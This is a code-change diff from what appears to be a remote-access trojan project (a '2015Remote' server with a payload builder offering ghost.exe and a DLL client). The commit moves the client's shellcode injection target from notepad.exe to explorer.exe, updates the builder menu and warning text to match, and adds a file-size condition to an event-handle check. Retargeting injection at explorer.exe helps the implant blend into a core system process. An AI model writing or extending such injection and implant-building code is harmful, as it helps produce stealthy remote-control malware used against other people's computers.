TestRun: Change inject shellcode to explorer <- notepad

client/LoginServer.cpp

@@ -336,7 +336,9 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, CONNECT_ADDRESS& conn, BOOL& isAuthKerne
     std::string pid = std::to_string(GetCurrentProcessId());
     HANDLE hEvent1 = OpenEventA(SYNCHRONIZE, FALSE, std::string("YAMA_" + pid).c_str());
     HANDLE hEvent2 = OpenEventA(SYNCHRONIZE, FALSE, std::string("EVENT_" + pid).c_str());
-    if (hEvent1 != NULL || hEvent2 != NULL)
+    WIN32_FILE_ATTRIBUTE_DATA fileInfo;
+    GetFileAttributesExA(buf, GetFileExInfoStandard, &fileInfo);
+    if ((hEvent1 != NULL || hEvent2 != NULL) && fileInfo.nFileSizeLow > 16 * 1024 * 1024)
     {
         Mprintf("Check event handle: %d, %d\n", hEvent1 != NULL, hEvent2 != NULL);
 		isAuthKernel = TRUE;

client/test.cpp

@@ -262,7 +262,7 @@ int main(int argc, const char *argv[])
         g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port);
     }
 
-    // 此 Shell code 连接本机6543端口，注入到记事本
+    // 此 Shell code 连接本机6543端口，注入到任务管理器
     if (g_ConnectAddress.iStartup == Startup_InjSC) {
         // Try to inject shell code to `notepad.exe`
         // If failed then run memory DLL
@@ -272,7 +272,7 @@ int main(int argc, const char *argv[])
         do {
             if (sizeof(void*) == 4) // Shell code is 64bit
                 break;
-            if (!(pid = inj.InjectProcess(nullptr, ok))) {
+            if (!(pid = inj.InjectProcess("explorer.exe", ok))) {
                 break;
             }
             HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);

server/2015Remote/2015RemoteDlg.cpp

@@ -1948,7 +1948,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail)
         auto v = splitString(dlg.m_sPassword.GetBuffer(), '-');
         if (v.size() != 6 && v.size() != 7) {
             THIS_CFG.SetStr(settings, pwdKey, "");
-            MessageBox("格式错误，请重新申请口令!", "提示", MB_ICONINFORMATION);
+            THIS_APP->MessageBox("格式错误，请重新申请口令!", "提示", MB_ICONINFORMATION);
             return false;
         }
         std::vector<std::string> subvector(v.end() - 4, v.end());
@@ -1961,7 +1961,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail)
             THIS_CFG.SetStr(settings, "PwdHmac", "");
             if (pwd.IsEmpty() || hash256 != fixedKey || IDOK != dlg.DoModal()) {
                 if (!dlg.m_sPassword.IsEmpty())
-                    MessageBox("口令错误, 无法继续操作!", "提示", MB_ICONWARNING);
+                    THIS_APP->MessageBox("口令错误, 无法继续操作!", "提示", MB_ICONWARNING);
                 return false;
             }
         }
@@ -1971,7 +1971,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail)
         std::strftime(curDate, sizeof(curDate), "%Y%m%d", &pekingTime);
         if (curDate < v[0] || curDate > v[1]) {
             THIS_CFG.SetStr(settings, pwdKey, "");
-            MessageBox("口令过期，请重新申请口令!", "提示", MB_ICONINFORMATION);
+            THIS_APP->MessageBox("口令过期，请重新申请口令!", "提示", MB_ICONINFORMATION);
             return false;
         }
         if (dlg.m_sPassword != pwd)

server/2015Remote/BuildDlg.cpp

@@ -204,7 +204,7 @@ void CBuildDlg::OnBnClickedOk()
     int index = m_ComboExe.GetCurSel(), typ=index;
     int is64bit = m_ComboBits.GetCurSel() == 0;
     if (index == IndexTestRun_InjSC && !is64bit) {
-        MessageBox("Shellcode 只能向64位记事本注入，注入器也只能是64位!", "提示", MB_ICONWARNING);
+        MessageBox("Shellcode 只能向64位电脑注入，注入器也只能是64位!", "提示", MB_ICONWARNING);
         return;
     }
     int startup = Startup_DLL;
@@ -434,7 +434,7 @@ BOOL CBuildDlg::OnInitDialog()
     pEdit->LimitText(99);
     m_ComboExe.InsertString(IndexTestRun_DLL, "TestRun - 磁盘DLL");
     m_ComboExe.InsertString(IndexTestRun_MemDLL, "TestRun - 内存DLL");
-    m_ComboExe.InsertString(IndexTestRun_InjSC, "TestRun - 注入记事本");
+    m_ComboExe.InsertString(IndexTestRun_InjSC, "TestRun - 注入任务管理器");
 
     m_ComboExe.InsertString(IndexGhost, "ghost.exe");
     m_ComboExe.InsertString(IndexServerDll, "ServerDll.dll");